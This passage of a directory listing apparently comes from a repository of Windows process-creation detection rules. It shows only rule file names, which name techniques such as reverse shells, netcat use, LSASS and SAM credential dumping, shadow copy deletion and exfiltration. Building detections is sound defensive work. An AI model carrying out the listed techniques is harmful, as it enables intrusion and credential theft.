proc_creation_win_powershell_download_com_cradles.yml │ │ ├── proc_creation_win_powershell_download_cradle_obfuscated.yml │ │ ├── proc_creation_win_powershell_download_dll.yml │ │ ├── proc_creation_win_powershell_download_iex.yml │ │ ├── proc_creation_win_powershell_download_patterns.yml │ │ ├── proc_creation_win_powershell_download_susp_file_sharing_domains.yml │ │ 
├── proc_creation_win_powershell_dsinternals_cmdlets.yml │ │ ├── proc_creation_win_powershell_email_exfil.yml │ │ ├── proc_creation_win_powershell_enable_susp_windows_optional_feature.yml │ │ ├── proc_creation_win_powershell_encode.yml │ │ ├── proc_creation_win_powershell_encoding_patterns.yml │ │ ├── proc_creation_win_powershell_exec_data_file.yml │ │ ├── proc_creation_win_powershell_export_certificate.yml │ │ ├── proc_creation_win_powershell_frombase64string.yml │ │ ├── proc_creation_win_powershell_frombase64string_archive.yml │ │ ├── proc_creation_win_powershell_get_clipboard.yml │ │ ├── proc_creation_win_powershell_get_localgroup_member_recon.yml │ │ ├── proc_creation_win_powershell_getprocess_lsass.yml │ │ ├── proc_creation_win_powershell_hide_services_via_set_service.yml │ │ ├── proc_creation_win_powershell_iex_patterns.yml │ │ ├── proc_creation_win_powershell_import_cert_susp_locations.yml │ │ ├── proc_creation_win_powershell_import_module_susp_dirs.yml │ │ ├── proc_creation_win_powershell_install_unsigned_appx_packages.yml │ │ ├── proc_creation_win_powershell_invocation_specific.yml │ │ ├── proc_creation_win_powershell_invoke_webrequest_direct_ip.yml │ │ ├── proc_creation_win_powershell_invoke_webrequest_download.yml │ │ ├── proc_creation_win_powershell_kerberos_kerberos_ticket_request_via_cli.yml │ │ ├── proc_creation_win_powershell_mailboxexport_share.yml │ │ ├── proc_creation_win_powershell_malicious_cmdlets.yml │ │ ├── proc_creation_win_powershell_msexchange_transport_agent.yml │ │ ├── proc_creation_win_powershell_non_interactive_execution.yml │ │ ├── proc_creation_win_powershell_obfuscation_via_utf8.yml │ │ ├── proc_creation_win_powershell_public_folder.yml │ │ ├── proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml │ │ ├── proc_creation_win_powershell_remove_mppreference.yml │ │ ├── proc_creation_win_powershell_reverse_shell_connection.yml │ │ ├── proc_creation_win_powershell_run_script_from_ads.yml │ │ ├── 
proc_creation_win_powershell_run_script_from_input_stream.yml │ │ ├── proc_creation_win_powershell_sam_access.yml │ │ ├── proc_creation_win_powershell_script_engine_parent.yml │ │ ├── proc_creation_win_powershell_service_dacl_modification_set_service.yml │ │ ├── proc_creation_win_powershell_set_acl.yml │ │ ├── proc_creation_win_powershell_set_acl_susp_location.yml │ │ ├── proc_creation_win_powershell_set_policies_to_unsecure_level.yml │ │ ├── proc_creation_win_powershell_set_service_disabled.yml │ │ ├── proc_creation_win_powershell_shadowcopy_deletion.yml │ │ ├── proc_creation_win_powershell_snapins_hafnium.yml │ │ ├── proc_creation_win_powershell_stop_service.yml │ │ ├── proc_creation_win_powershell_susp_download_patterns.yml │ │ ├── proc_creation_win_powershell_susp_parameter_variation.yml │ │ ├── proc_creation_win_powershell_susp_parent_process.yml │ │ ├── proc_creation_win_powershell_susp_ps_appdata.yml │ │ ├── proc_creation_win_powershell_token_obfuscation.yml │ │ ├── proc_creation_win_powershell_uninstall_defender_feature.yml │ │ ├── proc_creation_win_powershell_user_discovery_get_aduser.yml │ │ ├── proc_creation_win_powershell_webclient_casing.yml │ │ ├── proc_creation_win_powershell_x509enrollment.yml │ │ ├── proc_creation_win_powershell_xor_commandline.yml │ │ ├── proc_creation_win_powershell_zip_compress.yml │ │ ├── proc_creation_win_presentationhost_download.yml │ │ ├── proc_creation_win_presentationhost_uncommon_location_exec.yml │ │ ├── proc_creation_win_pressanykey_lolbin_execution.yml │ │ ├── proc_creation_win_print_remote_file_copy.yml │ │ ├── proc_creation_win_protocolhandler_download.yml │ │ ├── proc_creation_win_provlaunch_potential_abuse.yml │ │ ├── proc_creation_win_provlaunch_susp_child_process.yml │ │ ├── proc_creation_win_psr_capture_screenshots.yml │ │ ├── proc_creation_win_pua_3proxy_execution.yml │ │ ├── proc_creation_win_pua_adfind_enumeration.yml │ │ ├── proc_creation_win_pua_adfind_execution.yml │ │ ├── 
proc_creation_win_pua_adfind_susp_usage.yml │ │ ├── proc_creation_win_pua_advanced_ip_scanner.yml │ │ ├── proc_creation_win_pua_advanced_port_scanner.yml │ │ ├── proc_creation_win_pua_advancedrun.yml │ │ ├── proc_creation_win_pua_advancedrun_priv_user.yml │ │ ├── proc_creation_win_pua_chisel.yml │ │ ├── proc_creation_win_pua_cleanwipe.yml │ │ ├── proc_creation_win_pua_crassus.yml │ │ ├── proc_creation_win_pua_csexec.yml │ │ ├── proc_creation_win_pua_defendercheck.yml │ │ ├── proc_creation_win_pua_ditsnap.yml │ │ ├── proc_creation_win_pua_frp.yml │ │ ├── proc_creation_win_pua_iox.yml │ │ ├── proc_creation_win_pua_kdu_driver_tool.yml │ │ ├── proc_creation_win_pua_mouselock_execution.yml │ │ ├── proc_creation_win_pua_netcat.yml │ │ ├── proc_creation_win_pua_netscan.yml │ │ ├── proc_creation_win_pua_ngrok.yml │ │ ├── proc_creation_win_pua_nimgrab.yml │ │ ├── proc_creation_win_pua_nimscan.yml │ │ ├── proc_creation_win_pua_nircmd.yml │ │ ├── proc_creation_win_pua_nircmd_as_system.yml │ │ ├── proc_creation_win_pua_nmap_zenmap.yml │ │ ├── proc_creation_win_pua_nps.yml │ │ ├── proc_creation_win_pua_nsudo.yml │ │ ├── proc_creation_win_pua_pingcastle.yml │ │ ├── proc_creation_win_pua_pingcastle_script_parent.yml │ │ ├── proc_creation_win_pua_process_hacker.yml │ │ ├── proc_creation_win_pua_radmin.yml │ │ ├── proc_creation_win_pua_rcedit_execution.yml │ │ ├── proc_creation_win_pua_rclone_execution.yml │ │ ├── proc_creation_win_pua_restic.yml │ │ ├── proc_creation_win_pua_runxcmd.yml │ │ ├── proc_creation_win_pua_seatbelt.yml │ │ ├── proc_creation_win_pua_system_informer.yml │ │ ├── proc_creation_win_pua_trufflehog.yml │ │ ├── proc_creation_win_pua_webbrowserpassview.yml │ │ ├── proc_creation_win_pua_wsudo_susp_execution.yml │ │ ├── proc_creation_win_python_adidnsdump.yml │ │ ├── proc_creation_win_python_inline_command_execution.yml │ │ ├── proc_creation_win_python_pty_spawn.yml │ │ ├── proc_creation_win_qemu_suspicious_execution.yml │ │ ├── 
proc_creation_win_query_session_exfil.yml │ │ ├── proc_creation_win_quickassist_execution.yml │ │ ├── proc_creation_win_rar_compress_data.yml │ │ ├── proc_creation_win_rar_compression_with_password.yml │ │ ├── proc_creation_win_rar_susp_greedy_compression.yml │ │ ├── proc_creation_win_rasdial_execution.yml │ │ ├── proc_creation_win_rdp_enable_or_disable_via_win32_terminalservicesetting_wmi_class.yml │ │ ├── proc_creation_win_rdrleakdiag_process_dumping.yml │ │ ├── proc_creation_win_reagentc_disable_windows_recovery_environment.yml │ │ ├── proc_creation_win_reg_add_run_key.yml │ │ ├── proc_creation_win_reg_add_safeboot.yml │ │ ├── proc_creation_win_reg_bitlocker.yml │ │ ├── proc_creation_win_reg_credential_access_via_password_filter.yml │ │ ├── proc_creation_win_reg_defender_exclusion.yml │ │ ├── proc_creation_win_reg_delete_runmru.yml │ │ ├── proc_creation_win_reg_delete_safeboot.yml │ │ ├── proc_creation_win_reg_delete_services.yml │ │ ├── proc_creation_win_reg_desktop_background_change.yml │ │ ├── proc_creation_win_reg_direct_asep_registry_keys_modification.yml │ │ ├── proc_creation_win_reg_disable_defender_wmi_autologger.yml │ │ ├── proc_creation_win_reg_disable_sec_services.yml │ │ ├── proc_creation_win_reg_dumping_sensitive_hives.yml │ │ ├── proc_creation_win_reg_enable_windows_recall.yml │ │ ├── proc_creation_win_reg_enumeration_for_credentials_in_registry.yml │ │ ├── proc_creation_win_reg_import_from_suspicious_paths.yml │ │ ├── proc_creation_win_reg_lsa_disable_restricted_admin.yml │ │ ├── proc_creation_win_reg_lsa_ppl_protection_disabled.yml │ │ ├── proc_creation_win_reg_machineguid.yml │ │ ├── proc_creation_win_reg_modify_group_policy_settings.yml │ │ ├── proc_creation_win_reg_nolmhash.yml │ │ ├── proc_creation_win_reg_query_registry.yml │ │ ├── proc_creation_win_reg_rdp_keys_tamper.yml │ │ ├── proc_creation_win_reg_screensaver.yml │ │ ├── proc_creation_win_reg_service_imagepath_change.yml │ │ ├── proc_creation_win_reg_software_discovery.yml │ │ ├── 
proc_creation_win_reg_susp_paths.yml │ │ ├── proc_creation_win_reg_system_language_discovery.yml │ │ ├── proc_creation_win_reg_volsnap_disable.yml │ │ ├── proc_creation_win_reg_windows_defender_tamper.yml │ │ ├── proc_creation_win_reg_write_protect_for_storage_disabled.yml │ │ ├── proc_creation_win_regasm_no_flag_or_dll_execution.yml │ │ ├── proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml │ │ ├── proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml │ │ ├── proc_creation_win_regedit_export_critical_keys.yml │ │ ├── proc_creation_win_regedit_export_keys.yml │ │ ├── proc_creation_win_regedit_import_keys.yml │ │ ├── proc_creation_win_regedit_import_keys_ads.yml │ │ ├── proc_creation_win_regedit_trustedinstaller.yml │ │ ├── proc_creation_win_regini_ads.yml │ │ ├── proc_creation_win_regini_execution.yml │ │ ├── proc_creation_win_registry_cimprovider_dll_load.yml │ │ ├── proc_creation_win_registry_enumeration_for_credentials_cli.yml │ │ ├── proc_creation_win_registry_export_of_thirdparty_creds.yml │ │ ├── proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml │ │ ├── proc_creation_win_registry_install_reg_debugger_backdoor.yml │ │ ├── proc_creation_win_registry_logon_script.yml │ │ ├── proc_creation_win_registry_new_network_provider.yml │ │ ├── proc_creation_win_registry_office_disable_python_security_warnings.yml │ │ ├── proc_creation_win_registry_privilege_escalation_via_service_key.yml │ │ ├── proc_creation_win_registry_provlaunch_provisioning_command.yml │ │ ├── proc_creation_win_registry_set_unsecure_powershell_policy.yml │ │ ├── proc_creation_win_registry_special_accounts_hide_user.yml │ │ ├── proc_creation_win_registry_typed_paths_persistence.yml │ │ ├── proc_creation_win_regsvr32_flags_anomaly.yml │ │ ├── proc_creation_win_regsvr32_http_ip_pattern.yml │ │ ├── proc_creation_win_regsvr32_network_pattern.yml │ │ ├── proc_creation_win_regsvr32_remote_share.yml │ │ ├── proc_creation_win_regsvr32_susp_child_process.yml 
│ │ ├── proc_creation_win_regsvr32_susp_exec_path_1.yml │ │ ├── proc_creation_win_regsvr32_susp_exec_path_2.yml │ │ ├── proc_creation_win_regsvr32_susp_extensions.yml │ │ ├── proc_creation_win_regsvr32_susp_parent.yml │ │ ├── proc_creation_win_regsvr32_uncommon_extension.yml │ │ ├── proc_creation_win_remote_access_tools_anydesk.yml │ │ ├── proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml │ │ ├── proc_creation_win_remote_access_tools_anydesk_revoked_cert.yml │ │ ├── proc_creation_win_remote_access_tools_anydesk_silent_install.yml │ │ ├── proc_creation_win_remote_access_tools_anydesk_susp_exec.yml │ │ ├── proc_creation_win_remote_access_tools_gotoopener.yml │ │ ├── proc_creation_win_remote_access_tools_logmein.yml │ │ ├── proc_creation_win_remote_access_tools_meshagent_arguments.yml │ │ ├── proc_creation_win_remote_access_tools_meshagent_exec.yml │ │ ├── proc_creation_win_remote_access_tools_netsupport.yml │ │ ├── proc_creation_win_remote_access_tools_netsupport_susp_exec.yml │ │ ├── proc_creation_win_remote_access_tools_renamed_meshagent_execution.yml │ │ ├── proc_creation_win_remote_access_tools_rurat_non_default_location.yml │ │ ├── proc_creation_win_remote_access_tools_screenconnect.yml │ │ ├── proc_creation_win_remote_access_tools_screenconnect_installation_cli_param.yml │ │ ├── proc_creation_win_remote_access_tools_screenconnect_remote_execution.yml │ │ ├── proc_creation_win_remote_access_tools_screenconnect_remote_execution_susp.yml │ │ ├── proc_creation_win_remote_access_tools_screenconnect_webshell.yml │ │ ├── proc_creation_win_remote_access_tools_simple_help.yml │ │ ├── proc_creation_win_remote_access_tools_tacticalrmm_agent_registration_via_cli.yml │ │ ├── proc_creation_win_remote_access_tools_teamviewer_incoming_connection.yml │ │ ├── proc_creation_win_remote_access_tools_ultraviewer.yml │ │ ├── proc_creation_win_remote_time_discovery.yml │ │ ├── proc_creation_win_renamed_adfind.yml │ │ ├── proc_creation_win_renamed_autohotkey.yml 
│ │ ├── proc_creation_win_renamed_autoit.yml │ │ ├── proc_creation_win_renamed_binary.yml │ │ ├── proc_creation_win_renamed_binary_highly_relevant.yml │ │ ├── proc_creation_win_renamed_boinc.yml │ │ ├── proc_creation_win_renamed_browsercore.yml │ │ ├── proc_creation_win_renamed_cloudflared.yml │ │ ├── proc_creation_win_renamed_createdump.yml │ │ ├── proc_creation_win_renamed_curl.yml │ │ ├── proc_creation_win_renamed_dctask64.yml │ │ ├── proc_creation_win_renamed_ftp.yml │ │ ├── proc_creation_win_renamed_gpg4win.yml │ │ ├── proc_creation_win_renamed_jusched.yml │ │ ├── proc_creation_win_renamed_mavinject.yml │ │ ├── proc_creation_win_renamed_megasync.yml │ │ ├── proc_creation_win_renamed_msdt.yml │ │ ├── proc_creation_win_renamed_msteams.yml │ │ ├── proc_creation_win_renamed_netsupport_rat.yml │ │ ├── proc_creation_win_renamed_nircmd.yml │ │ ├── proc_creation_win_renamed_office_processes.yml │ │ ├── proc_creation_win_renamed_paexec.yml │ │ ├── proc_creation_win_renamed_pingcastle.yml │ │ ├── proc_creation_win_renamed_plink.yml │ │ ├── proc_creation_win_renamed_pressanykey.yml │ │ ├── proc_creation_win_renamed_rundll32_dllregisterserver.yml │ │ ├── proc_creation_win_renamed_rurat.yml │ │ ├── proc_creation_win_renamed_schtasks_execution.yml │ │ ├── proc_creation_win_renamed_sysinternals_debugview.yml │ │ ├── proc_creation_win_renamed_sysinternals_procdump.yml │ │ ├── proc_creation_win_renamed_sysinternals_psexec_service.yml │ │ ├── proc_creation_win_renamed_sysinternals_sdelete.yml │ │ ├── proc_creation_win_renamed_vmnat.yml │ │ ├── proc_creation_win_renamed_whoami.yml │ │ ├── proc_creation_win_rpcping_credential_capture.yml │ │ ├── proc_creation_win_ruby_inline_command_execution.yml │ │ ├── proc_creation_win_rundll32_ads_stored_dll_execution.yml │ │ ├── proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml │ │ ├── proc_creation_win_rundll32_inline_vbs.yml │ │ ├── proc_creation_win_rundll32_installscreensaver.yml │ │ ├── proc_creation_win_rundll32_keymgr.yml 
│ │ ├── proc_creation_win_rundll32_mshtml_runhtmlapplication.yml │ │ ├── proc_creation_win_rundll32_no_params.yml │ │ ├── proc_creation_win_rundll32_ntlmrelay.yml │ │ ├── proc_creation_win_rundll32_obfuscated_ordinal_call.yml │ │ ├── proc_creation_win_rundll32_parent_explorer.yml │ │ ├── proc_creation_win_rundll32_process_dump_via_comsvcs.yml │ │ ├── proc_creation_win_rundll32_registered_com_objects.yml │ │ ├── proc_creation_win_rundll32_run_locations.yml │ │ ├── proc_creation_win_rundll32_setupapi_installhinfsection.yml │ │ ├── proc_creation_win_rundll32_shell32_susp_execution.yml │ │ ├── proc_creation_win_rundll32_shelldispatch_potential_abuse.yml │ │ ├── proc_creation_win_rundll32_spawn_explorer.yml │ │ ├── proc_creation_win_rundll32_susp_activity.yml │ │ ├── proc_creation_win_rundll32_susp_control_dll_load.yml │ │ ├── proc_creation_win_rundll32_susp_execution_with_image_extension.yml │ │ ├── proc_creation_win_rundll32_susp_shellexec_execution.yml │ │ ├── proc_creation_win_rundll32_susp_shellexec_ordinal_execution.yml │ │ ├── proc_creation_win_rundll32_susp_shimcache_flush.yml │ │ ├── proc_creation_win_rundll32_sys.yml │ │ ├── proc_creation_win_rundll32_udl_exec.yml │ │ ├── proc_creation_win_rundll32_unc_path.yml │ │ ├── proc_creation_win_rundll32_uncommon_dll_extension.yml │ │ ├── proc_creation_win_rundll32_user32_dll.yml │ │ ├── proc_creation_win_rundll32_webdav_client_execution.yml │ │ ├── proc_creation_win_rundll32_webdav_client_susp_execution.yml │ │ ├── proc_creation_win_rundll32_without_parameters.yml │ │ ├── proc_creation_win_runonce_execution.yml │ │ ├── proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml │ │ ├── proc_creation_win_sc_create_service.yml │ │ ├── proc_creation_win_sc_disable_service.yml │ │ ├── proc_creation_win_sc_new_kernel_driver.yml │ │ ├── proc_creation_win_sc_query_interesting_services.yml │ │ ├── proc_creation_win_sc_sdset_allow_service_changes.yml │ │ ├── proc_creation_win_sc_sdset_deny_service_access.yml │ │ ├── 
proc_creation_win_sc_sdset_hide_sevices.yml │ │ ├── proc_creation_win_sc_sdset_modification.yml │ │ ├── proc_creation_win_sc_service_path_modification.yml │ │ ├── proc_creation_win_sc_service_tamper_for_persistence.yml │ │ ├── proc_creation_win_sc_stop_service.yml │ │ ├── proc_creation_win_schtasks_appdata_local_system.yml │ │ ├── proc_creation_win_schtasks_change.yml │ │ ├── proc_creation_win_schtasks_creation.yml │ │ ├── proc_creation_win_schtasks_creation_temp_folder.yml │ │ ├── proc_creation_win_schtasks_curl_and_powershell_combo.yml │ │ ├── proc_creation_win_schtasks_delete.yml │ │ ├── proc_creation_win_schtasks_delete_all.yml │ │ ├── proc_creation_win_schtasks_disable.yml │ │ ├── proc_creation_win_schtasks_env_folder.yml │ │ ├── proc_creation_win_schtasks_folder_combos.yml │ │ ├── proc_creation_win_schtasks_guid_task_name.yml │ │ ├── proc_creation_win_schtasks_one_time_only_midnight_task.yml │ │ ├── proc_creation_win_schtasks_openssh_tunnelling.yml │ │ ├── proc_creation_win_schtasks_persistence_windows_telemetry.yml │ │ ├── proc_creation_win_schtasks_powershell_persistence.yml │ │ ├── proc_creation_win_schtasks_reg_loader.yml │ │ ├── proc_creation_win_schtasks_reg_loader_encoded.yml │ │ ├── proc_creation_win_schtasks_schedule_type.yml │ │ ├── proc_creation_win_schtasks_schedule_type_system.yml │ │ ├── proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml │ │ ├── proc_creation_win_schtasks_susp_pattern.yml │ │ ├── proc_creation_win_schtasks_system.yml │ │ ├── proc_creation_win_schtasks_system_process.yml │ │ ├── proc_creation_win_scrcons_susp_child_process.yml │ │ ├── proc_creation_win_sdbinst_shim_persistence.yml │ │ ├── proc_creation_win_sdbinst_susp_extension.yml │ │ ├── proc_creation_win_sdclt_child_process.yml │ │ ├── proc_creation_win_sdiagnhost_susp_child.yml │ │ ├── proc_creation_win_secedit_execution.yml │ │ ├── proc_creation_win_security_susp_node_js_execution.yml │ │ ├── proc_creation_win_servu_susp_child_process.yml │ │ ├── 
proc_creation_win_setres_uncommon_child_process.yml │ │ ├── proc_creation_win_setspn_spn_enumeration.yml │ │ ├── proc_creation_win_setup16_custom_lst_execution.yml │ │ ├── proc_creation_win_shutdown_execution.yml │ │ ├── proc_creation_win_shutdown_logoff.yml │ │ ├── proc_creation_win_sigverif_uncommon_child_process.yml │ │ ├── proc_creation_win_sndvol_susp_child_processes.yml │ │ ├── proc_creation_win_soundrecorder_audio_capture.yml │ │ ├── proc_creation_win_speechruntime_child_process.yml │ │ ├── proc_creation_win_splwow64_cli_anomaly.yml │ │ ├── proc_creation_win_spoolsv_susp_child_processes.yml │ │ ├── proc_creation_win_sqlcmd_veeam_db_recon.yml │ │ ├── proc_creation_win_sqlcmd_veeam_dump.yml │ │ ├── proc_creation_win_sqlite_chromium_profile_data.yml │ │ ├── proc_creation_win_sqlite_firefox_gecko_profile_data.yml │ │ ├── proc_creation_win_squirrel_download.yml │ │ ├── proc_creation_win_squirrel_proxy_execution.yml │ │ ├── proc_creation_win_ssh_port_forward.yml │ │ ├── proc_creation_win_ssh_proxy_execution.yml │ │ ├── proc_creation_win_ssh_rdp_tunneling.yml │ │ ├── proc_creation_win_ssm_agent_abuse.yml │ │ ├── proc_creation_win_stordiag_susp_child_process.yml │ │ ├── proc_creation_win_susp_16bit_application.yml │ │ ├── proc_creation_win_susp_abusing_debug_privilege.yml │ │ ├── proc_creation_win_susp_add_user_local_admin_group.yml │ │ ├── proc_creation_win_susp_add_user_privileged_group.yml │ │ ├── proc_creation_win_susp_add_user_remote_desktop_group.yml │ │ ├── proc_creation_win_susp_alternate_data_streams.yml │ │ ├── proc_creation_win_susp_always_install_elevated_windows_installer.yml │ │ ├── proc_creation_win_susp_appx_execution.yml │ │ ├── proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml │ │ ├── proc_creation_win_susp_archiver_iso_phishing.yml │ │ ├── proc_creation_win_susp_automated_collection.yml │ │ ├── proc_creation_win_susp_bad_opsec_sacrificial_processes.yml │ │ ├── 
proc_creation_win_susp_browser_launch_from_document_reader_process.yml │ │ ├── proc_creation_win_susp_child_process_as_system_.yml │ │ ├── proc_creation_win_susp_cli_obfuscation_escape_char.yml │ │ ├── proc_creation_win_susp_cli_obfuscation_unicode_img.yml │ │ ├── proc_creation_win_susp_clickfix_filefix_execution.yml │ │ ├── proc_creation_win_susp_clickfix_filefix_whitespace_padding.yml │ │ ├── proc_creation_win_susp_cmd_for_loop_execution_with_recursive_directory_search.yml │ │ ├── proc_creation_win_susp_commandline_path_traversal_evasion.yml │ │ ├── proc_creation_win_susp_copy_browser_data.yml │ │ ├── proc_creation_win_susp_copy_lateral_movement.yml │ │ ├── proc_creation_win_susp_copy_system_dir.yml │ │ ├── proc_creation_win_susp_copy_system_dir_lolbin.yml │ │ ├── proc_creation_win_susp_crypto_mining_monero.yml │ │ ├── proc_creation_win_susp_data_exfiltration_via_cli.yml │ │ ├── proc_creation_win_susp_disable_raccine.yml │ │ ├── proc_creation_win_susp_double_extension.yml │ │ ├── proc_creation_win_susp_double_extension_parent.yml │ │ ├── proc_creation_win_susp_download_office_domain.yml │ │ ├── proc_creation_win_susp_dumpstack_log_evasion.yml │ │ ├── proc_creation_win_susp_elavated_msi_spawned_shell.yml │ │ ├── proc_creation_win_susp_electron_app_children.yml │ │ ├── proc_creation_win_susp_electron_execution_proxy.yml │ │ ├── proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml │ │ ├── proc_creation_win_susp_embed_exe_lnk.yml │ │ ├── proc_creation_win_susp_emoji_usage_in_cli_1.yml │ │ ├── proc_creation_win_susp_emoji_usage_in_cli_2.yml │ │ ├── proc_creation_win_susp_emoji_usage_in_cli_3.yml │ │ ├── proc_creation_win_susp_emoji_usage_in_cli_4.yml │ │ ├── proc_creation_win_susp_etw_modification_cmdline.yml │ │ ├── proc_creation_win_susp_etw_trace_evasion.yml │ │ ├── proc_creation_win_susp_eventlog_clear.yml │ │ ├── proc_creation_win_susp_eventlog_content_recon.yml │ │ ├── proc_creation_win_susp_execution_from_public_folder_as_parent.yml │ │ ├── 
proc_creation_win_susp_execution_path.yml │ │ ├── proc_creation_win_susp_file_characteristics.yml │ │ ├── proc_creation_win_susp_filefix_execution_pattern.yml │ │ ├── proc_creation_win_susp_gather_network_info_execution.yml │ │ ├── proc_creation_win_susp_hidden_dir_index_allocation.yml │ │ ├── proc_creation_win_susp_hiding_malware_in_fonts_folder.yml │ │ ├── proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml │ │ ├── proc_creation_win_susp_image_missing.yml │ │ ├── proc_creation_win_susp_inline_base64_mz_header.yml │ │ ├── proc_creation_win_susp_inline_node_js_execution.yml │ │ ├── proc_creation_win_susp_inline_win_api_access.yml │ │ ├── proc_creation_win_susp_jwt_token_search.yml │ │ ├── proc_creation_win_susp_lnk_exec_hidden_cmd.yml │ │ ├── proc_creation_win_susp_local_system_owner_account_discovery.yml │ │ ├── proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml │ │ ├── proc_creation_win_susp_lsass_dmp_cli_keywords.yml │ │ ├── proc_creation_win_susp_ms_appinstaller_download.yml │ │ ├── proc_creation_win_susp_network_command.yml │ │ ├── proc_creation_win_susp_network_scan_loop.yml │ │ ├── proc_creation_win_susp_network_sniffing.yml │ │ ├── proc_creation_win_susp_no_image_name.yml │ │ ├── proc_creation_win_susp_non_exe_image.yml │ │ ├── proc_creation_win_susp_non_priv_reg_or_ps.yml │ │ ├── proc_creation_win_susp_ntds.yml │ │ ├── proc_creation_win_susp_nteventlogfile_usage.yml │ │ ├── proc_creation_win_susp_ntfs_short_name_path_use_image.yml │ │ ├── proc_creation_win_susp_ntfs_short_name_use_cli.yml │ │ ├── proc_creation_win_susp_ntfs_short_name_use_image.yml │ │ ├── proc_creation_win_susp_obfuscated_ip_download.yml │ │ ├── proc_creation_win_susp_obfuscated_ip_via_cli.yml │ │ ├── proc_creation_win_susp_parents.yml │ │ ├── proc_creation_win_susp_powershell_execution_via_dll.yml │ │ ├── proc_creation_win_susp_priv_escalation_via_named_pipe.yml │ │ ├── proc_creation_win_susp_private_keys_recon.yml │ │ ├── 
proc_creation_win_susp_privilege_escalation_cli_patterns.yml │ │ ├── proc_creation_win_susp_proc_wrong_parent.yml │ │ ├── proc_creation_win_susp_progname.yml │ │ ├── proc_creation_win_susp_recon.yml │ │ ├── proc_creation_win_susp_recycle_bin_fake_execution.yml │ │ ├── proc_creation_win_susp_redirect_local_admin_share.yml │ │ ├── proc_creation_win_susp_registry_modification_of_ms_setting_protocol_handler.yml │ │ ├── proc_creation_win_susp_remote_desktop_tunneling.yml │ │ ├── proc_creation_win_susp_right_to_left_override.yml │ │ ├── proc_creation_win_susp_script_exec_from_env_folder.yml │ │ ├── proc_creation_win_susp_script_exec_from_temp.yml │ │ ├── proc_creation_win_susp_sensitive_file_access_shadowcopy.yml │ │ ├── proc_creation_win_susp_service_creation.yml │ │ ├── proc_creation_win_susp_service_dir.yml │ │ ├── proc_creation_win_susp_service_tamper.yml │ │ ├── proc_creation_win_susp_shadow_copies_creation.yml │ │ ├── proc_creation_win_susp_shadow_copies_deletion.yml │ │ ├── proc_creation_win_susp_shell_spawn_susp_program.yml │ │ ├── proc_creation_win_susp_sysnative.yml │ │ ├── proc_creation_win_susp_system_exe_anomaly.yml │ │ ├── proc_creation_win_susp_system_user_anomaly.yml │ │ ├── proc_creation_win_susp_sysvol_access.yml │ │ ├── proc_creation_win_susp_task_folder_evasion.yml │ │ ├── proc_creation_win_susp_use_of_te_bin.yml │ │ ├── proc_creation_win_susp_use_of_vsjitdebugger_bin.yml │ │ ├── proc_creation_win_susp_userinit_child.yml │ │ ├── proc_creation_win_susp_velociraptor_child_process.yml │ │ ├── proc_creation_win_susp_weak_or_abused_passwords.yml │ │ ├── proc_creation_win_susp_web_request_cmd_and_cmdlets.yml │ │ ├── proc_creation_win_susp_whoami_as_param.yml │ │ ├── proc_creation_win_susp_workfolders.yml │ │ ├── proc_creation_win_svchost_execution_with_no_cli_flags.yml │ │ ├── proc_creation_win_svchost_masqueraded_execution.yml │ │ ├── proc_creation_win_svchost_termserv_proc_spawn.yml │ │ ├── proc_creation_win_svchost_uncommon_command_line_flags.yml │ │ ├── 
proc_creation_win_svchost_uncommon_parent_process.yml │ │ ├── proc_creation_win_sysinternals_accesschk_check_permissions.yml │ │ ├── proc_creation_win_sysinternals_adexplorer_execution.yml │ │ ├── proc_creation_win_sysinternals_adexplorer_susp_execution.yml │ │ ├── proc_creation_win_sysinternals_eula_accepted.yml │ │ ├── proc_creation_win_sysinternals_livekd_execution.yml │ │ ├── proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml │ │ ├── proc_creation_win_sysinternals_procdump.yml │ │ ├── proc_creation_win_sysinternals_procdump_evasion.yml │ │ ├── proc_creation_win_sysinternals_procdump_lsass.yml │ │ ├── proc_creation_win_sysinternals_psexec_execution.yml │ │ ├── proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml │ │ ├── proc_creation_win_sysinternals_psexec_remote_execution.yml │ │ ├── proc_creation_win_sysinternals_psexesvc.yml │ │ ├── proc_creation_win_sysinternals_psexesvc_as_system.yml │ │ ├── proc_creation_win_sysinternals_psloglist.yml │ │ ├── proc_creation_win_sysinternals_psservice.yml │ │ ├── proc_creation_win_sysinternals_pssuspend_execution.yml │ │ ├── proc_creation_win_sysinternals_pssuspend_susp_execution.yml │ │ ├── proc_creation_win_sysinternals_sdelete.yml │ │ ├── proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml │ │ ├── proc_creation_win_sysinternals_sysmon_config_update.yml │ │ ├── proc_creation_win_sysinternals_sysmon_uninstall.yml │ │ ├── proc_creation_win_sysinternals_tools_masquerading.yml │ │ ├── proc_creation_win_sysprep_appdata.yml │ │ ├── proc_creation_win_systeminfo_execution.yml │ │ ├── proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml │ │ ├── proc_creation_win_takeown_recursive_own.yml │ │ ├── proc_creation_win_tapinstall_execution.yml │ │ ├── proc_creation_win_tar_compression.yml │ │ ├── proc_creation_win_tar_extraction.yml │ │ ├── proc_creation_win_taskkill_sep.yml │ │ ├── proc_creation_win_tasklist_module_enumeration.yml │ │ ├── proc_creation_win_taskmgr_localsystem.yml │ │ ├── 
